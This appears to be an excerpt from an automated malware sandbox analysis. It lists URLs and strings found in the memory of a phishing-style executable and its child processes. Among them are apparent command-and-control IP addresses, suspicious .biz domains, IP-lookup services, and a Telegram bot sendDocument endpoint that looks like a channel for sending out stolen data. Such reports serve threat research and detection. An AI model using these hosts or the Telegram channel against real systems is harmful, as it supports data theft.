Source: alg.exe, 0000000B.00000003.1785481441.00000000005BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/
Source: zeXKjViL.exe, 00000022.00000002.2057791312.0000000005E90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/tloalmkxssnuris
Source: alg.exe, 0000000B.00000003.2319647398.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/ld
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1750433396.0000000001311000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2509027263.0000000000567000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2490536622.0000000000567000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2490536622.000000000059C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1751356659.000000000059C000.00000004.00000020.00020000.00000000.sdmp, zeXKjViL.exe, 00000022.00000002.2057791312.0000000005E90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1750433396.0000000001311000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/0
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1750433396.0000000001311000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/6noh
Source: zeXKjViL.exe, 00000022.00000002.2057791312.0000000005E90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/G
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1750433396.0000000001311000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/Kn
Source: alg.exe, 0000000B.00000003.1751356659.000000000059C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/W
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1750433396.00000000012A1000.00000004.00000020.00020000.00000000.sdmp, PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1804169295.0000000006A0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/haobwbcukjixe
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1804169295.0000000006A0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/haobwbcukjixeEK
Source: alg.exe, 0000000B.00000003.2509027263.0000000000567000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2490536622.0000000000567000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2522275296.0000000000567000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/lcaecfwoxcmb
Source: alg.exe, 0000000B.00000003.1751356659.000000000059C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/mshapsve
Source: alg.exe, 0000000B.00000003.1751167364.00000000005BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1752034139.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1769440706.00000000005B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/mshapsvejF
Source: alg.exe, 0000000B.00000003.2490536622.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/vcdhvtdni
Source: alg.exe, 0000000B.00000003.2490536622.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/vcdhvtdni4/
Source: alg.exe, 0000000B.00000003.2490536622.0000000000567000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/vcdhvtdnibG
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1805369474.0000000006A74000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177:80/haobwbcukjixec
Source: alg.exe, 0000000B.00000003.2043821981.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177:80/oxojrkg
Source: alg.exe, 0000000B.00000003.2490536622.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177:80/vcdhvtdnis
Source: zeXKjViL.exe, 00000022.00000002.2058666059.0000000005EE3000.00000004.00000020.00020000.00000000.sdmp, zeXKjViL.exe, 00000022.00000002.2057791312.0000000005E90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://72.52.178.23/
Source: zeXKjViL.exe, 00000022.00000002.2058666059.0000000005EE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://72.52.178.23/8N
Source: zeXKjViL.exe, 00000022.00000002.1998728250.0000000001192000.00000004.00000020.00020000.00000000.sdmp, zeXKjViL.exe, 00000022.00000002.2057791312.0000000005E90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://72.52.178.23/ehlglgm
Source: zeXKjViL.exe, 00000022.00000002.2057791312.0000000005E90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://72.52.178.23/ehlglgmf
Source: alg.exe, 0000000B.00000003.2043821981.0000000000567000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://72.52.178.23/xpqdcslnorZG
Source: zeXKjViL.exe, 00000022.00000002.2058666059.0000000005EE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://72.52.178.23/yN
Source: zeXKjViL.exe, 00000022.00000002.2058666059.0000000005EE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://72.52.178.23/~N
Source: zeXKjViL.exe, 00000022.00000002.2057791312.0000000005E90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://72.52.178.23:80/ehlglgm
Source: alg.exe, 0000000B.00000003.2043821981.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://72.52.178.23:80/ewlG
Source: alg.exe, 0000000B.00000003.2404953266.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://72.52.178.23:80/mt0
Source: alg.exe, 0000000B.00000003.2043821981.000000000059C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/
Source: alg.exe, 0000000B.00000003.2276780321.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2276851295.00000000005E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/mxuujpbjwek
Source: alg.exe, 0000000B.00000003.2043821981.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/yrkakyyuj
Source: alg.exe, 0000000B.00000003.2043821981.0000000000567000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/yrkakyyujbG
Source: alg.exe, 0000000B.00000003.2043821981.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/yrkakyyujok
Source: alg.exe, 0000000B.00000003.2043821981.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197:80/yrkakyyuj
Source: Microsofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: Microsofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comd
Source: Microsofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000013.00000002.2962626553.000000000257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Microsofts.exe, 00000013.00000002.2962626553.0000000002511000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Microsofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/d
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: Microsofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgd
Source: zeXKjViL.exe, 00000022.00000002.2057791312.0000000005E90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cvgrf.biz/
Source: alg.exe, 0000000B.00000003.2509027263.0000000000567000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2490536622.0000000000567000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2522275296.0000000000567000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dwrqljrr.biz/
Source: powershell.exe, 00000016.00000002.1836325671.0000000006033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: alg.exe, 0000000B.00000003.2490536622.0000000000567000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://oshhkdluh.biz/
Source: powershell.exe, 00000016.00000002.1815132146.0000000005115000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Microsofts.exe, 00000013.00000002.2962626553.00000000025AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: Microsofts.exe, 00000013.00000002.2962626553.00000000025AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.orgd
Source: AppVClient.exe, 0000000F.00000003.1738761071.00000000004E3000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000F.00000003.1739252603.00000000004F2000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000F.00000003.1738915554.00000000004EA000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000F.00000002.1740234733.0000000000502000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.microsoft.co
Source: powershell.exe, 00000016.00000002.1815132146.0000000005115000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1743418494.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, zeXKjViL.exe, 0000000A.00000002.1969679616.0000000003011000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000013.00000002.2962626553.0000000002511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1815132146.0000000004FC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000016.00000002.1815132146.0000000005115000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: alg.exe, 0000000B.00000003.1811642166.0000000001830000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1810999604.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzczYTViOTk3
Source: alg.exe, 0000000B.00000003.1811075524.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1827012271.00000000005EC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2276780321.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2319213027.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1828304171.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2337109742.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2362330225.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1811544228.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2347520396.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2374942508.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2320859769.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2300658084.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2042471889.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2334108033.00000000005DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/ewl?usid=27&utid=10221865931
Source: alg.exe, 0000000B.00000003.1811075524.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1827012271.00000000005EC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2042802989.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1811544228.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2042471889.00000000005DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/ewl?usid=27&utid=10221865931-
Source: alg.exe, 0000000B.00000003.2487771643.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2378624503.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2439037295.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2478810531.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2520863860.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2469824753.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2374643516.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2428261033.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2403997151.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2381504483.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2379712272.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2448551766.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2450029854.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2519990908.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2389962725.00000000005DD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2421255187.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2507445109.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2374942508.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2456649330.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2380661999.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2395959016.00000000005DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww7.fwiwk.biz/m?usid=27&utid=10221880067
Source: alg.exe, 0000000B.00000003.2487771643.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2378624503.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2439037295.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2478810531.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2520863860.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2469824753.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2428261033.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2403997151.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2381504483.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2379712272.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2448551766.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2450029854.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2519990908.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2421255187.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2507445109.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2456649330.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2380661999.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2378427431.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2379494326.00000000005DD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2457233820.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2389807495.00000000005FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww7.fwiwk.biz/mt?usid=27&utid=10221880299
Source: zeXKjViL.exe, 00000022.00000002.2058666059.0000000005EDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww7.przvgke.biz/ehlglgm?usid=27&utid=10221870153
Source: alg.exe, 0000000B.00000003.2060995477.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1827012271.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2301761637.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2317492901.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2321083742.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1811075524.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2276780321.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2319213027.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1828304171.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2337109742.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2362330225.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2347520396.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2374942508.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2320859769.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2300658084.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2042471889.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1800665917.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2334108033.00000000005DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww7.przvgke.biz/xpqdcslnor?usid=27&utid=10221865676
Source: alg.exe, 0000000B.00000003.2043821981.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww7.przvgke.biz:80/xpqdcslnor?usid=27&utid=10221865676
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000016.00000002.1815132146.0000000005115000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Aut2exe.exe.11.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/
Source: Aut2exe.exe.11.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/8
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: powershell.exe, 00000016.00000002.1865189964.0000000008B14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: officesvcmgr.exe.11.dr	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: officesvcmgr.exe.11.dr	String found in binary or memory: http://www.openssl.org/support/faq.htmlerror
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1768352562.0000000005F70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com8:
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: alg.exe, 0000000B.00000003.1971135671.00000000015A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: alg.exe, 0000000B.00000003.2334108033.0000000000567000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xlfhhhm.biz/iz/
Source: powershell.exe, 00000016.00000002.1815132146.0000000004FC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: alg.exe, 0000000B.00000003.2654192501.00000000007B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: officesvcmgr.exe.11.dr	String found in binary or memory: https://clients.config.office.net/manage/v1.0/serviceabilitymanager/MsaDeviceTokenMsaLastUpdatedMsaE
Source: alg.exe, 0000000B.00000003.2136814355.00000000015D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxFailed
Source: alg.exe, 0000000B.00000003.2140176531.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2139918284.00000000015D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
Source: powershell.exe, 00000016.00000002.1836325671.0000000006033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000016.00000002.1836325671.0000000006033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000016.00000002.1836325671.0000000006033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: alg.exe, 0000000B.00000003.2654268087.00000000007B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: alg.exe, 0000000B.00000003.1811642166.0000000001830000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1810321677.00000000014B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://euob.netgreencolumn.com/sxp/i/c4601e5f6cdd73216cafdd5af209201c.js
Source: powershell.exe, 00000016.00000002.1815132146.0000000005115000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: setup.exe0.11.dr	String found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
Source: setup.exe0.11.dr	String found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
Source: powershell.exe, 00000016.00000002.1815132146.000000000591A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1815132146.00000000056F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: alg.exe, 0000000B.00000003.2654340509.00000000007B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: alg.exe, 0000000B.00000003.2654340509.00000000007B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1
